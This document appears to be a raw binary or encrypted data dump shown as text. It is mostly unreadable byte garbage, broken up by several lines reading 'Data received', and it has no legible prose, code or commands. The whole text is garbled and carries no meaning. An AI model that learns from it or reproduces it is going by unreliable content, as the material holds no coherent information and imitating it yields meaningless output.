w´X;¤¢=vÉHUá-.w´Ö¼$-‚̉ôyO*¦-ýh`j‚íʺD¸\/!”Ö‰ý‡EŒ*ù¿é‰v3n¬¤±ÿ×ÛE€ß‰“ßs<shÃWº`!¨€ „„zì¥*¶áLÜm†X±˜ Tä¬Ú6‚æɃe#&˜a4¢;瀪t/úI"Z6¥a(C‰ÁÁ¥æÝ9Ëñ¥ß]՝çI¿R³—µpv<“´j-eV¼Û-øˆëqAjÏ9³«„ÜJ'Zd{r±'„ ¨¾¶ÿ¦âª†8ìýï×Á4Ž]gì&N}Æzú›9­µBŒ@ú{hÚqéý¡>±€y$Uë2?ÃñÜ ñkÇnÐɼÁËÕ2µ
Data received (d¥”#ãœ[“9Ü/¶7I$ôYCv4ý(õä q¨Ä?K"NQfŸÄÆQxRlu肒¢eôÉ4"{½‰'mØÿ®k­z qÌ<³`deW9µø©Ú¯}ßø>NwFżº°|6‡{6…®\Ó.úˆ;R’ž®×Eã˜=:Á±0Å}ðb V¬X'ôàò$rQÂHéZåöUY,Ök¾æŠF¾n3ùlʓ¢7:›XÂç M.֐fÏË"`L»ŸŽ¡</=sQäõøXIÖq±º@ä:„Ã÷ìØ°¹PiPÏìØKã²5~_YȘLºÙ?¹ƒ#œùÉa¬”JÁÚl¹¹Ýùæ”Oƒ*z÷N%:€ñ‚hŶín%å5‘¢º¥qYbN¦;¤=(ßPÁ¡ØÀIf¼ pN¯®ý(?yÊP³oZŒ¥ÀÑ´½{«Wß¼_LÚ{µ÷_t$˜JL°Üæ"0ïÀb²'É«³|±¶àŠ%0»:Ù%£/ÖÛÌke‚tGÅd!É3lJo{O,ÒúCä¥é¨x=ξaýäoB۟ZpHjÃ×ç ÀÚÔa¬Òä¸ÈtÍß?•|HFw†B RÐZ•Ûj„?¾¸Zq±%Ç¿]H³3µªà¸¯Dá +Õؒg¡ƒuâk€ ìGÍRoò0¼öt>uøô½= Ò#úÛU÷)tÊ+Ôë¥÷ÊùM”3}¹»žÃqÑ:]H0F§çHÞ?§P»Ä•šÈÜåù§Ô‹u Øs’%<2” ÿ´%Sœþ՝M¤]P: Y5’؀Ù÷ rqÝå›9¥¢(P"›t¡²îI|iU 3øÉZ|ÚdDæ'*!«‚z³‚›ß$f·©Þæšdb úM`x!\î˜÷YÅ«/åÒYï L4¶]kêk§¶ž(NÑƾò•Ê(²wôƒrMå´C–ËoŸUE,ªIÿMYRKÞH„Ò=5VÃB„1U0¯(¼5GÑāX_á'XÚ* Œr˲g(üò.í1ŸK²½À4K5Àï&o Ýó‹×a±4 K”Æu⤠äî·%ýÍ®}œ’wšGDfq<vñ+‰ª÷»ÊG“'eDÇ´Ê]J\õ¥–d¾¤°Ö&˜Møii } æê å5âR3º¶QËëk¿‘fvPò1)óä»Â»9(fj—|_Ò½¯¤ËNn «rԈrM q¤8¦[%†|[)ÉĤÔ8±8+&º ^-ÝTofÃß½/K$Š˜¼9ߟР]q;ý $9×Áܖ"Z¢"böd'wlHÿ>qßd ›M&Ldö†ó.ëáG*ÐFÈb¾¸|ÝZ×uPTv‡œ CÑÁqbæÓn—ð[R;õˆÄ›°š™Í&¨Áˆ è÷½cCL-p_AcÄ»{£pEÀ³§“Dú¾¡ î&àÄe'ò {^ü.ÒP,5Á̓^ÈäªXPìՆ è á=ËÕtcΔîA0©” ` “J4†8bAPqºÆËÞ]ñ\lˆBî;©ð]×(Š yF­@Â/)‰Ó¬ÀÙy6÷bÛ¢Ü0;Q¥ˆ·zRJ“~݄˜éNö«$œuRÙÅå¼ ßÖUt»;Jùn2pˆù¸¾bKá ñ `Ûv‰¢öµÕ\®XD=‚›|Œeហ¸6npLè'¿»‚÷•€’Ñ3u¶õ†pç"r¶-ûԈª.ÁÑ.ïFurÎ^j{'>½ÄL¸Ò™Üoü, ‘ƒÛºÉ˹y[€ú¬w<Šç¥˜è®£”ѽàns.0ctç±ëä…ß”©¹d¼µ­Úù3 F”¹¡ùjÙ€*eB8” =CIS|\„ A’ÇãA^ÞÐ*«Áö0]myäž#Q/Z¥âº`.<„¦ôèwc˜w­º·—EՒ¥Ã¸-Èemc¯7“O¤‚W| ¹/ õZEà•jBMPZG }ÖÌs-9„ü“Gô„»Ú1‚KN34 {a¤µÄF~Tœ2>IµBü`oã¿á%–MY§%jaà FêµRM&M­$Ïýä÷KÔ<ÙagÄÙªàøª“Ÿðì>6ã'o.XÁ× œ|äŽ7ªÞê>vŸ}|¨Qø\E<”÷Öñ]aÇ0Zs×·Ø|¦?À!æ g’ÆUPîar†áYiù¤åN¤ OzB£¡ø S:ÎÀ5Œ—Gx8q¯½fî+ãË4Ѥ®xlAbY‚Bše_±Â«K¡•À7hzþ•°@ÆÛkíSၧvhA˜7m9pÆ'&¿þµ8ۍ`îÊêLº«Vj3°S—<&sµÛoÖ.b15·m|Ëg­\vàë‹Ì¦Jr1ØâY5߉Ä3df¡7û’ÒH¢.Í'"´‚I–ô,cˆ’Zbž¤ÿ †S~lÈÚYþ ô:B‰ûêÎ%°¯ú¡V]Út @W^鼕0hNîZqP‰GŸ¥|¯,#,ò°:7TGº·XYÐ}Ê·:è~é/TôCž÷¹R›6"÷êqlC^§»?ÐoÖSщèú[µxÙá#™R$zNPˆÔp×T÷6ž:1ô-ºãÑÀæÌ@SìiŽßMHÂõ¶é+…Bg­í¿6öû0| äpÁ/ÔæĊã=ÛØ ‡ÚæâíÝúšÚ¢"ðqáYOõ]¿å•¡0<N¤)“(Å|Eà-¯56_½Ñ÷ÓN)hØÇ+«2aEˆmN€Fõm(¶ÕÕ"DT«øðKñøVñLaˆù$hãîÓRcSW™Ó|k½n‘ååN~¾†ÑÌ«{„ àŸøŸ^M7.dQJ}õ€výH¼Ác±Zâð^Ý1]Ô@ó\ÌÞù lz߸DôÒ`wãv›þwÇ6I3"tÖ7…¯TÐü eöQ˜…qžÙƒ¹Z~QäxÜ°+4ïþ3s†§DÄ·4†I×­1i"øTÂ,íúԓ±ýÕ®†€VœÈt7kp‹½/<Ui–Z‰µ¤·²ù Eæ’¤6¾¸+ÃÑPeâ¡*êu’s›¡e‹§þêC­V}/ù›Zƒà%`%#fÎlUÿc2;¨*‰2Òœaw‡Òvœä&›¼4·º‹@Fó("πÒցß*ؔRÉé°f;ÞÇàÐâTyøâ‹ó‹¸E †%_øx”{îDYâ;ÝóùŸ{Kmº[Ä~VÛ X¶ã#ggŸ§J\pÿŽ&:Rk·Z¬÷@¿ü®?ttÖ³õfø²žb® B¾:M…ô‰Î¤,FJ i›?@„þ!I—~ÈþÕ'tê!ni°<]rD JÙàX„Ž@eYi­t´ÍL+@âG´^-‹]Í1àÍéC„OY?m¯ÍÏû¶$9±Ó~À¼³J<…áqNCIˆyìªÐ#WÕ‹É6þlÌoÿ‰F Óa!±9to¾"6"`Á ÷ñþ½Ž63MîŠçFˊµ±AÜk ¦ ñ£üò¯Õ©ON9Z0üG›§]1ö~gۦǷ€œ«ÿâV¾®ÅC ”Xç‰7·ŽñvõޗWA"ïÿ©§ÿ‘àԈ³u¿²i›ÿIâÓJ¸5kë‚p*ëÙŵ<Iné”xÿÌ%”‰¾÷"Z'J¹²Ùã*>>¢'ÀókUL2lûÖ§müsM¥¸{ڙ<®L“‡У¨;ˆ{]8Êó”“ÕÎüã¡¡¢Fý¹" <*‰‹˜UM’qÂ7Ö}àدî3š0Æ}øî¨}M•¶­çƒ‰
Data received ȕç€yÅZTsÝ£pjلŸShà¹5¼Ö4㸦8;qW_ÐÍÏ¢û”¿ÞÄñXËqFÒsIéÚÝ*§K@~úx ñYK/HºË„RäV•²­¤c%36Ë°ó<vI;)æU'lð`©oäb¹EIr&ó¼'[S_%äɖæ’ÿ€@œ~ãÜbNn¢Û½¤†Ý]®µúà¥pˆÎ̹”Óǜ„D‰9q–nc[ZsM5•2ù Ö«¼é¯0]™†ÎççUô‚þEKCZÔ0©×èöS†aª6¸d¨®…#ù¼1DÛuŽ ô(;܌­_ÿÜÉfYìÞ4/% ¿?8(ñÓ*€ tæa¦ÁA`õb€*ÓZˆë?*w lzIߞâg˪‡õ6Úrۏ)‘<üÀ›Û$í$HɳS#9]WwvÉ) F¸Œ¯q*ý#)ëÖ¨°^FåÕpû¼j¬lІ¦w3›¤9;û¤ïP­xKcÉö éœ!±Œ=ì:–+ £ãߌèZ3ŠÈµ®»@VÛð±N¸×ËÌ%ÔmÓÆ<•—¡®˜ôžE܈Qž®ÈЋ›Ô’DÓâõeêïUz§ñÈu; F‹F¡ÕÏêÅç œøŸ>WžÅ ÜA ÿ(š†'ß=:ÈșðQ鈣+˜…³'÷£¿‡Ì¾z̃dË#1²ê’hFÒÔj#qùkÛ3¾,€yèeQN/3öÕó…~0Ï ¤zF×ë)<+Ûº¸>E%Jû¦ìgt^Ž†S¤0K»Ý[dÛVu׌á&Q‰YŒ= |d›,ÇëŠèœJÎJ¡ãÎ`åà¤M—ëù¾˜¨7fóÑ@Y´ ó­YË̈́ˆ·>…ŽÊ;åå^[wðÓ;îO;ª“P§ò]!VßüŸåKšF @‚à;†X³³$ÔK6Ÿ']–R¯ý_‹4FÜX–b.»Ö¾Ø‚ïwÝf‡2NÈÄõÒÙdÇSZ«¦Æu6:aíãنtT•4¿/æ× Sš’;G.nÙ æ±õÃ8°´ÜÐü™‚±BMIð&øœSz·ô¬ŠÙÀ‹¬O=Üp8”¾„Mªö*ÎðAPdÙºõ'àSId^ØaO)GìÔ°õbw6µ+rV{^nž3vÒ¹6Bø¸ÑºÝè„ i)YsLá¼@ôAF¥‹Øñ;;¯~5‘ÔPôLu£d¶ŽûÝ0­D|ðGVÿlj֠ߚ•ó9rS&¦<p«üðçp'\»;sxÿIö©;œ¦C…ê1Y‘hg«|“°¬±UJKü™#So[R¸Aƒé0ٟK{o‹:§ÀMÔkƾ²ÏAy ³¤‘âØ݀lÀŒXÐp.î_ {óSp5ä@^V¾ÇÇLc´-¹Ÿ¨ÌÜ·$æˆâ£b™”‰÷ZŠ¼S¨Š3è€]¢8H Óኯìüæ»AԎ Åü¹ÿõiÛEÖ2M…t£RyøõÊAf‹²Ìw°T £MK‰{Ô!ÉٌþØ ŒGKÎ3ìWÑ<?´Ú—ìâýê3…RhR¿ RÉՂ˜3ÈE:¹W’"h+B-„ž±)½®íxѼÄ¿ ßÊ*d‰^v¹IÌv—÷ÿz*  mE½Ø>Á&Ft>~Ïp0÷œûÃ01]Êõ$6OùšÅÌô:ªkÛ/úތç§|º™`I}Œ)z¤>‘`ÓÚmw\g]qHN1¿#«ê3>x¡‹Ê :ÈçW÷ ö s€ê;à¾à)ü/¡}—>õzÑ!ñ„u-ZŽ2#Õ²¬o5äØS›µ!YÛýàÄg “VwúØûý„:¼c‚|ã³g ˆbYú…ÅŸúÔÐÞw+MD¨fýÊÌ=¢;½¢ .N£^OÙÜE|â é~|.É°ßXeÁqœ#°1: 8îXrɸ'Î Ý ä|!åÑ¦W¨¹%HXA;Pã guH—Ê^’ñùO“žóœ̹8ôßq;& 1H{ZÏöíïmðÉü{Zº*$å2×ò}d±ÀF†§ÐÕ¥FéC›ä®ŠÏ< jüìÏû4¥2ÃæŠêêdàÍ8•X¸ #É%ؤ೼¨>þ kMe÷ûE—j‰á“¬Ún,î3P‡UÕ0ύûʈ¬ÓøÊqˆÙ˜L~q>1Lj¢Þ¾qOzþÞI„£½W&×üIlØKÊ£ÍçÆt_ø‰K½'….IêÔ¸ÂïG™âÝw®ßHŠ½Ÿ”šZv¯Õ%XºÔ›/$ÿVN‚ḿ«`TO(ëAÿ\"r¥¥Áe|{A±Ž³ê•ã¤åõQQ“Óìw7 C¥t*1ëÏ_P#|s¼+¹––béá2DÛYJµ!DO£vÒ°R@™cÊåðíEIûKw,Á[zËOŠ=áuÛ-4£9Ÿ>Øqf¶ÜU5jØë\æ—ëø\´´½µïÑ7Þä4ª{îQÆEC[½«Ú Ív¾“ÔaRÍsñí=ÀÍG¹\Ð¥*0û¦49¥û nñݍ.˜Ž'¨òÒg†ªcóæ¤ÉB BÉ3S`IÉç}ÒB,s-ûôE´!äæÒέ©-ãd5, U&R%}ö:cË»É÷û"GêfAËË·ÌWK+žoæÿ¡F¹>P!%ÃðþéF†·¦ÅdšxÞ“LnºDú"Þ^ÏeÚHzëõt׏«våpÞ6i5¼ä¤ÿÖ­+³Ü0Éj`Ëïól ÜYaýrº‚ý±³“ MÜ¢£Çp®`hÖѨèú=ᢷþÌ÷ak–á+H…Ékµž3·²‰žÉõƒñOR®Å´̤’ªé›Þü]’'ÿ=å•`E¿D#m ªRÝnø˸V’ ¯¡¬“ãÊÓ· X‚ã6Fqq•jPáNQ‹‰ö:¥è>€¬óS‰½µ7FxhN^ë‚UV‰ag#[Í~óM•~ù÷}ƒÊyýϕWœ€rç”þÓ|ZõoMmlïü­ÏÉ;H¿.Ë«uVÍ,¡—ÁDb­ÙE.0Rêù®LKRà•>}<$Í¢„zƒcÐa÷˜£R—‘CÈXc×[uLOQUÏ)oôÛ¶ñ²×$¿sšÕmÆvå¥mHl®Â\}F¥ÜƒšÇ3qÿ,‹åÍ­ûB‰Ù—VšµEn|¼˜­< ”?õÿƗ¸ØÝ+‹Ç.hãØù”íàÙ6L<Š:˜5"ÀdgyO“‡ÎÅlI§öÇny1JSm]—dI‚zRÏNÿŸ‡væB=,EwÉ}€þÂþ;ÍÖC¢H%' p ™b¸Ü?°þ¤š<}FÅÖê—…+÷y> ~Š.ÿ¢+6õmaœ’—fLˆš;ŒÛtdPÂóÕÈ­ŽäÅðïõUp­+/^kü¾¶™70DÌïÛrÞÚAþn¿}¥±x‚yNr-#É8—E Ä îR²¿›Ê“ù‡%¥ù ‘êÚ²m }¢¾o’¢µž+ûEõóh]äòÆ]“Ë-ԝ?$>FFú—1©J›­ …׬¼íyÖ¨4—Þ õÌ~ìÏýߐ~ÀÚ½wõåo†¦C­Å{ýí ¨ S¼?/`Ӑ¯dÃ>ík±½´¥Ëɂ™ã?:­Zä¼Ã—‚½ÿ¹dâ´fҁ–ØM–ð(¼“N¢9ÞE¬6ç÷ ¯ÈW¥Òh 50š ·;Í:?ª-ÓòŠ­§”6òfLBÕŊët§+x &¼éê5d3a<&Á岑Ví'üÉ )Ï[“/*³oÜÎ5ºcdþjÿÔuŸ)MsªwÚÊ>|°½
Data received ºFÇ4'”´±Ÿ8Cd¶Ð"닓ŠÄ=,wªfWÕF1­­ªä Âè§WZ‰HMp1uR-KxwÛgrÛÁ)ЈåŸÌês¶‚΂…/$ü"£pîJ­·ÏÃ!¶ö÷èˆsykn„׆¯¦¾häì@~1ªþû0üÂÖµ£»ä–‡vþ^…ÍáÙjYÔ ]õóG{Ôôô¦0+0P2óF*û*À]Ñe"Óäe òSvìp‚^"ÓuAýýíÛⵦ–P%/“î¹E+ôÖý°ªì]GüÕsy‰Oږ5% þÉØjÜÃ*:If&fế}„hn/¿Qsrã”Ъ„Žwå&tn¯àn•Eˆ åÊ7èçká]‰iˆœÛ³3-…ÚØ£•îg“!§×ó·! ;6ºï“ÏÄåLŒm›0Ó5ÙêÿÇ hƒQ°(m<…}Nðjð¬d´Äû ¸,ƒßl¥¶‚°xæJŽp-³`vBƉŠn«X+Ê6 ú¦»9d™à?ŸÛ!'ø1 cÅ:Ñ?¡! Þ‚Dr½ fT" ¿¤àý$»¡ÞÛz±E,?°ëßüÄçqa+0uôPkáýOô‘FS™šã?ûÙ0eVÔϛŽ»Z¥sR¸î'Xô%¨3%úAýQAãÙéß³ƒÀA¢ B P”ÐÞ&à¨ò<²ÌæüJÉ기|’E½h2áf@ÜÖÕÛÄ !ÆpÇÝùÓ&ó½Üڝ…óK ÷‚ú` aÞM ã’ˆêöÌѴ͕#‡Bß(ËܳçŽÛŠ ۄ^į:~5^эí;ŠU, EŒˆÿMÀvYDt|¹«v²Þ»M{x™¾=GßœÑ %ƯùO®ž í?ä¸ëÕ íFíc ûáíðä¿÷6'U_÷]ôø•W‰•ÏöC”¨†Ê2IÔ¹´ÖXØ„ÎɎßõÆÉ8ßppš¾Ñ|–ô™a®£¥âê@º -‹ßu€ÂtËJxVLJO—¨çže/šˆJŠ%AðÙ1›ö&€2³›5·Ñ >nô×+yqc/å•Ê• ŽJrôb†l|±Ûq„ñW®Á ¶#˪\qˆ¡Jˤˆ¨ØÉÎÊîpú@ý'ÞɐçÃµŸ ä\˜—KX‹«Bû¥< ëJb·eíö„¯dK9Ñ21ãª=ÃHìnáFü*Â<D4¯ÀûYq0Jßlá²=jéRî:ÔՐ‡T|ñ `v¨OjÜ$åQ<j “ Á擂ìÅÕ%q8M8ÝΠÊWüÜ/)ÏoMÞé2\Y’GW®óƒþ¶×á{l*+N¶ˆ¾xÂNPuqâڙÖ9½Mtí˜uaÅ9µ{G‰ZÔ²˜ÿ¥ÿ ’—å¤×·Xdx•¼n²°¨Ô ¹á`¦µ¼ûØ®§ïYU;El žÿ/l,Ç×ì©~ÚÒs]äúpyìö/Ÿ~¾ j¨S$Œ\šô0D×ßM¨ íËÛ(ˆÐú…zª2qo¾Uä»A~˜x^é?}lç*Qe8Ĩ` êS9×-Éò~[áèÉOÀlüÄ,‰£Ù›s 7-p@Â_ÒÙ Ê0?ñ::ÂsØJÒ*ʃ ·{Ùá5_oѧÕ¶fE!øK­´Ñî7Z‡ &P,mÏ'7zšR¹ŽM£Bâ¹Hnõð,ÇX8·obWÏ»)Š &BÓêŒ$ʝTWIÛd2„ª±aÐѤhµÜS¬Ê=ߔ)È:>Tùæ˜ÆB¨‹æ&ç¢úqj¾žn¦é5‰)µý\šQ0È+l5û—'@Ît¦½•Í.YB–¦\ø²“‘‘¡¥I Ó&!Ø:šøB°i+¬l•è$R¨à@Ü$åèØ°µ„iÒ줸˜^7¹·n'È݅‘ã‘GîBˆÿ=ò*78K?•¾/3 „¢cC^G¤Žý,Ê?ºŸ]‚ÓøiéÀY—q@‘<3sӜ’¤òµmÅ5cÒuêk_mßyK˜0¿#ùè‰! ›ë’5×Ð6æ,¢ô:¢ ¸A‡°Ó¡% ±ÈÄ Y ÿâ‹y o{s)á͂Ï;Ôìë-ì^X·Mºî¹dM ¼“Y{æSÖ¿_}ô"ùµÎ¿)ªôP! Å̎“ôÒ'º‰U˜›d¬ª>©;2úÔ(æFç)S¼ÿ²©T>“ó²ÏhÖ¢XzéešÐ0nÓ2 Ê ¤æ“K·žøŽ[錧4 …ÜÛOmԃ²f$âáÿVùùds¨~„VÂ"&‚ÿߨ9\Éì mL(x¡fÒ9ûIÙqhé]Ó7©Brý°®Â•‹ETAÍ1cð™Àw֋œ¤>mMèu±Ö­[ûR¢åe«fû”À“‘èê‘LBó[öC]¬¯9šË)ˆ]T3=AgøOÃnsÚìGÛ fìß´¦hÜÁ++3²zכ÷5k•íà¢ï©«9…s _RðàsiB ¸5~¯.„ÚYF&>*“-ò ÈS*†ÎM€Fi%¯Þې1À“8ê#ÕAsoJv:H(Øz™k1Ó¸ªÄjþÏy”dæáBæҟ ª¨m™ç÷lšŽÖ#“š»[ÞӜÓuq+4ãB‡£e*×øáTá"±¸…LÂT&ñQ¶Ià“I³™œQ™,#CW‰œÐo qz=Ó9€üz“ÊWfmáÅS”ÝvôþÁ£Ï<„k­Wõ±d6c¦ ™ :DÐ`Û֞S¤Ž[Æ”å €>Ær®$Ÿ^0&}PáVëÉí&_Q–¶Q kÔv’´¡¯â“I Š´AãDڏ™K44G^² .äÁgeˆµ¾÷°]ÊJnj^¦Acs+´±z°´d%XN8¶Æ5ýe´UºX?ϼµŸDØ̪có‰šNoboá oppЦ-3N0~˜¼;ݔáÆ,Ÿ•-»Áƒž9*Êۈ琐qTd¡Ëžn×Sülr<’یދ-õ<f‡kÆ»O ™VnN'ðцÅXf±RBnüä¼Þkîƒ j<6j.¬æ$š`±2’§ûƒ•÷vp% ·Ní[bà¡õ&:,+їwì³ôM1ЃÑ>ž~ƒÅï¦èºÜ§Sò¦8EÖd;jê~`ˆ–Tz ¬·€1I4s>HrfmA!W~£0ÌbÛÕ,ÂG"hê›X–>ŒB™ä´òΙ·ÆßSU¨n¼5…Lá àH „ɺz[å91ö‡€üGë1t{Ü-ö˛ò¯×+– @Ÿ€Õ…ÁÞ)s¹ƒõ-ò|.WԂìB„=£pĦé‡mÑ9¥”u˾²<ˆàO‘ «ä4at;ïžÊ8Ë}xo¬JJܺNô°#Ê¡3@‚k€°@Çfñ®`îþJ/ÔÈÄKV@à›ñ§aØÖqþQiÜ5×áoÛ¦,ÎÌ}›ê0P›Ód Cp}÷ðئÃhí÷=¼Ž> ÁWÊ#^@œ¦c°Í¢, v;…ÅãD)¼Îº`kvmr ’f1s§0O’8/ä•(QÖ5£j±c;"f•Ÿ=íîègñ1lWQ¼O;¢ØÌ'æ³:Påµ2ŠçY wV‚±Ò$t`;^pG…[‹_ž¾‡bÌ…øãÇ7|ÊúW>]þ4æ(kËù Åj™.ìEji¡„àe¥3 ø.Ô+²~s(m~”Õ2glÒ¸T™EŠ8t?D%ìÆ@÷ÏéKÒ"!¼”*[ù§P±CXõyãfß*©é…ûŸ‘~2ûb:N1ì†Þ%³N{e,e³¢ý-5J€Œ
Data received nÇ!v€Aƒ¥ºÆÉ·>”ÚzqBà·ác‚MÏ4±(ý¶ïÒ Š¡«Ÿ;¥ HpdO:f?ðW€ÏT<ê.µ ¿äT"h¯ÀÚMÝ}«jéìu<M5RÜ®5ª} Û¿U/IFFpý‡É)²Å]8QxWû¢ã¾¶÷A|]ÓÕr³Ö…ÿd°MWÆëìEâTÁ¨š¨Xõ¢«ÚÁÝIÒÍ%ûõ™‘þŒe §ÐèOê°gЩ¹7Y“]”!‘]ŽWoÉ2!)=Ùyüéɓ ×hâ,NLIcÿëÉjÙ2’fçȚm|­Ð ¹Ò®&!ÃÓÿyA˜@;äՖ+ O_Ô‡mç *êí‰LÄȃý§c ôɎ+>IüÎ;Ý7/ðƒÖ­W}ǯÄƙ"MÇùFO÷øÅÀÌõÐÊ9ðºeˆ¢Óâxb¢õÙ0¢R:Òý`–g<”SÛxÕgŒˆ^k•{32‹úö›±Z›´/7–Çêm»Ÿiý3œû3ïM5VNÛDÉfq€ü|ÝåP}³3Á߸þ{âT%ǖ¯–Ö" £âzôCŒ¾ž@Žá$’´¥¿Œ%Y`iOÃjÙþÒþKŠtׄAcyÝ?‹)G„Ãv–F_ãtoø©šqÊmÚO”‚sñ%ôûð÷Óuæ<ö]˜¡§KÒ'CàÁ–ëb$`æN,˜«Ï¥¯#5Iª£6ìšASiý ¼5):(*ÝZ‡âÌ/7^£.âçw9ԛ­$4¸~ÁÕõàkR«5Ámñ¾˜\¸y¡½é’%ÅvüՋ|ucE¥Kö·ÎUû{îM…×äi'ʯ_P5~ÅDŸS16™á§wìDsØƳá1ýwXÕ¤P¾tÇçàsou ,Îù@A«+3Mžt]sèÄH}y¹iÑèöØs\kjú¬ƒ¬/Îi^^‰èœt„vŤNI‚4ü»Åçr˜g¼Z…˜Ô­?£X ×¹xbeTMÍvUƛï4"#"Õ¿"XùºDlÇûÜ:ña˜œ_+4kT -…ÃL«¯ç á2ØO‚Z•ˆOô5ÑKï9½]—-¶ÓŸÛZ&`—…±î[1tFûï l„°ç1!}>õí]ò…R ˜ýIdZ6÷Ùó›X»-*À]š—{&^‰¨†8¾>²ÔçY¼$3¯AÚò]JJÉNҍ0_d÷nð ÓÚm‚²Ï{¼jºV³ñŠ4=5)LÕi|(<*ìR–ÌÁ=b_jxn-Ú¹1?C¡ðö%±|ºRôìã!nµ ÅÁÓN…Ž Ém  þ7ù(‰éò”9HçwÏJLKExÎtQòÙBoƒ£E²Ä€2¬ZºM‰mւ¬ã¼"¯qÚ¬Þ)`sÆ=žˆVKO%kcR6çM8`Glå8ŒÃTÎèÅÕþ2,ô`·=Mv!#y¶B•Zã𝄓UÍӋ[[ã<—œ²HnD·0HßZñ>£N3"-XJl.LMãÄq1×öv¾x©ÙíÿϪxßZ£ü"i_èàe3‚dGˆÒ°eç*Âr-Ý5 jø3&èý1µH×YÃ%’¿ÙÎÏ ¼Â¹ÉÈ€2M._GækÊ 5³èǀfóMC‘`ßq7nÞí¸ôk”üÀÕÓἁtµôw[Š 1ÀŠ‰9°¦IjR~Æ"vˆœa)üðõ¥1{3N¥W¸y&Žì+_ñ2)èïO£¡Y—^’Œír6ØB:ëïŸ!™1ôŒ h/÷²5I3KŸÅJM[À<™ÈèƒÁÞI§‡DüØÃJ3sòIpã3gE-VŽp9/",FŒõ°Ö"SeôبÜÿ¹QPXŽú¨NES+ÑAȬjÇ2»³¢O ʜ†|mØÂ×¼*š½,Á¯Œ¥ÖÍ(¡×a˜I¿Lg–•»,Ò5˜·ÿü˜EŠWœV­€oc¼È …ÎXl֚³=Â^±ƒFþö)Ùe\é"*ŒÖI¶s¹ªÆؿҝ}êÍvë7Êäkß9³jsÕaЁäVA·úê’z½Oœùë?„ÂÕt˜{¤* ^hEž ªÃÚ?Ý|ÄT¢§áyð²¡;žU\ÀÜÁˆzäè;éÖÝ¡öJÝEÂÕì®I'â®dJ*ð# DRÙ]·eF:˜ àʽç%=m²ëªÂµ«ÆÅ'Áü™Zÿêüâb`eB¢UÉdü"š2c%U»ÖÂf8_5Ws½ª*P&Aøßî{¥ ÆÀcÁþÅýÝã4…!"þõK·PJ3 ª©wÈùõÆÝ*ö„)dɄ5O^ÉhÈ%¤¬T‹™Ü¥lϳ×?ó ¡ûÂÊÄÏxž-oM¨íP-¡Cr2ü`þã}sÈ4°¥”(ûtƒPwÞQEÎL¹)nh3×¹ü½”àŸQP\upŒ_Â+N]ÀHH¢é SA{ëq‡ÃzŸŒøù¼è±: ‹°2q—k¥€|Ý1Ú;t"—ýí‹.Y>ºÜ‹Ô•js…Î2Uìí`]CæÈ{_3nc ‘{4Ÿ ·«zj°‘Qf±7:ÝER‰&£‘UÍôçRmßó×8©Yrþ…9¼Ìû¼ÃyEßÞ¤0ˆnšŠöŸÖ—®:uÇý¥Q N ­ _íïËÅER¬è >¥“*ݙîц}Ü{9‹¡õe~L–Åš®Ã'lŸî¯(IÚÇåû7þ^(Ã/ŒñåôÌC/B†nÿúZÂ+¯ýM¶ù(î„=uß҄¾lË?všÂÀύù®­Îdm Eµè ¿>ÝÐÒËbïÎ>qRÊ Ó1óò3æZÒ¹z…›2ÂE|5çf#Žíâ ι(w-̚Ñ'^ÊÖa%ÿ‚Ùp5¨·jh¿’kýҙ¹ºrV†g¢†k1l‚-? ß7º,cœLí­õpø…† d­¯—…2…«q¹ÈþÅürä Mn£S¥•Üë]é_ÜF4Î$›š(™ä%í8ÖmÈ^ñ– ÁKêªÍe8Qæ:©HßkÊ@¼zX‡-ýÞƒp[@XiZ„k QÔßf^&¼ÝI(°1P)ƒÒsÔ¨º#†[Õ]¬4»Ç­ÿWO%Íۛ¯4½­T¬•'eÊ;ÈØù¸`jףŘÑ+Æ*'½ªˆcŸúrïå¸ò5'0ï^½¿÷b2.´é¢ª?óÆ8ÐÒ±¿ ,omª€S6]0­¡Pdȸʺ.—Ž ‰'´%Vf¤[ºÓñH®lô±ÞöÐÿǔؓŠ{òíh‰WÖt¢0[Â;µ4aYM¸ÖðÒT†‚Þ±©’Œ.¥4§+Q”O,—ÖùOþs!0Ä(Õ=ZÓsjêtÕ2óì¾å:ºÄs9À‡§ÄCæÌY“<Æ'=߈Á"9±ne‰ÂANQëŸxáÅ+ݶÖ‚̺/œÇªµŒ+ƒ_U“s,Tý9–Ñ~ªX¤yfNj;¦<Zx_­ø–¡øU ¦‡< zì¾5 Äáñ™n#Ÿã0éR:¾—͏aÄ<3fmgbÇ]ìNðäÞ@*Åua‹ ”ð–Æðû©œ©¶Èþ¤Ï¦ÚG™ÇYÏõCézö\Xºëˆœ r¡”qNI°öÁ¿—Žkh4ŠÊË€|ØtWŽŽ)ÜÉzd¥rÿJ¸Sz­Ü)'³ë–äáD"~‡§cX±¹ñæ‚F›JkoiöHkPÕuɃ›˜É.MØ9:"3Üô2ÝÊPňԉ«KÞG:Î+Tf q €ùý‹ÇDê(Ù1Ä1&7Ýí¥Š
Data received å”*7Èï:­G%K¢Réhë G¾ 8ζ»×1þwÿ-!Îñb}ْ6葠‘*¨·œg?(IݯÜ\È<âK­á­…Eü,| ØTç–áPñ^PÙNÔ¡z#,Ð؊€1ë´ë ¢úJÔm†€½boÁiŠK:_bÀê4µÛf М’ßȕÇG`Éír†¬J:¿rÂpLñ·œØ«ÄDþM"®‚†H¿ì±²¤™ÝÛ9h§5Ùº=×4™chIÛycžô¶ãr}ïßÝ跉t¬…Ù N䶝ÄÔú1ɧ8"8ë·ßG“‰RЮÍÝ@±~B³®\ÊjP/«Èº…Š^¹—lí\»–D­ ÑûXe˜ÛÄ4Ø}ݲ‹‡ï*ώÒÆòû ¢ K*'EGÉ0DˆøÍ<Óኒ|×0GÃñnߥL’13=‚év)“nV¹Žª,}2ÖÛ³nÍ-ìŒaìÊ©ìi>›)> ̆Cp–±øÿøfH#÷Æ$FèM¤ÑÎèàÍrq¢õ—î ¤(bôÊúÛæ1"9:‚IµïiÈò)¼¿hô”Šý+‚ìWIQHÛ[!1‰ pR˜Õ Žä¬_‰XeŠ¶*œ\t3Õ°,É&ZÂ8¯‰ÚC̂€,ðÕî)…²i¾ù;ñ$bømݽ˜ï2VP_°P.i0àã5Ñ\o¥^ݲCBQÑ÷„œ·#¿ Rä_ÞD¾hÞ Áï+ßí­ ~28º$^%Ő7¶Xhü‰„Ÿ•Ñë tžµ'®„ö÷ÐRõ§8õ.k{OŸÎ+ yk¦lPl„ª\ÕÉpm\ÇY XÒՏœ ¹Gš³É(AÞÜ"ǭŁHjæÙüv›-ÅÐ#3Ù¹× âoÓòqLo³CÏ×wÊ‚ 